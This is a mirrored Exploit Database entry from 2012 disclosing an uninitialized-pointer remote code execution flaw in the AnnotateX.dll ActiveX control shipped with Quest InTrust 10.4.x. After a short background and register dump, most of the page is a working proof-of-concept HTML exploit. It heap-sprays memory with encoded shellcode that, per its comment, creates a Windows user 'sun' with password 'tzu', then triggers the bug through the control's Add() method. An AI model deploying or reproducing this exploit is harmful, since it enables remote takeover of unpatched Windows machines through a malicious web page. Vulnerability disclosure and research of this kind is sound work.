Quest InTrust 10.4.x – Annotation Objects ActiveX Control ‘AnnotateX.dll’ Uninitialized Pointer Remote Code Execution

• Exploit Database
• 116 阅读

• 作者： rgod
  日期： 2012-03-28
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18674/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125

  Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution     homepage: http://www.quest.com/intrust/   description: "InTrust securely collects, stores, reports and alerts on event log data from Windows, Unix and Linux systems, helping you comply with external regulations, internal policies and security best practices."     download url of a test version: http://www.quest.com/downloads/   file tested: Quest_InTrust---Full-Package_104.zip     Background:   The mentioned product installs an ActiveX control with the following settings:   binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C} ProgID: AnnotationX.AnnList.1 Implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): True Safe for Initialization (IObjectSafety): True   According to the IObjectSafety interface it is safe for scripting and safe for initialization, so Internet Explorer will allow scripting of this control from remote.   Vulnerability:   By invoking the Add() method is possible to call inside a memory region of choice set by the attacker through ex. heap spray or other tecniques.   Example code:   <object classid=&apos;clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C&apos; id=&apos;obj&apos; /> </object> <script> obj.Add(0x76767676,1); </script>   ... eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001 eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010202 ANNOTA_1+0xae62: 4400ae62 ff1485504a0244calldword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=???????? ...   You are in control of eax: fully exploitable. As attachment, proof of concept code.       <!-- Quest InTrust 10.4.x Annotation Objects ActiveX Control (ANNOTATEX.DLL) Uninitialized Pointer Remote Code Execution PoC (ie7)   binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C} ProgID: AnnotationX.AnnList.1 Implements IObjectSafety: Yes Safe for Scripting (IObjectSafety): True Safe for Initialization (IObjectSafety): True --> <!-- saved from url=(0014)about:internet --> <html> <object classid=&apos;clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C&apos; id=&apos;obj&apos; /> </object> <script language=&apos;javascript&apos;> //add user one, user "sun" pass "tzu" shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" + "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" + "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" + "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" + "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" + "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" + "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" + "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" + "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" + "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" + "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" + "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" + "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" + "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" + "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" + "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" + "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" + "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" + "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" + "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" + "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" + "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" + "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" + "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" + "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" + "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" + "%u7734%u4734%u4570"); bigblock = unescape("%u0c0c%u0c0c"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<1000;i++){memory[i] = block+shellcode} </script> <script defer=defer> obj.Add(0x76767676,1); //this should result in an address beginning with 0x1d1d[..] </script>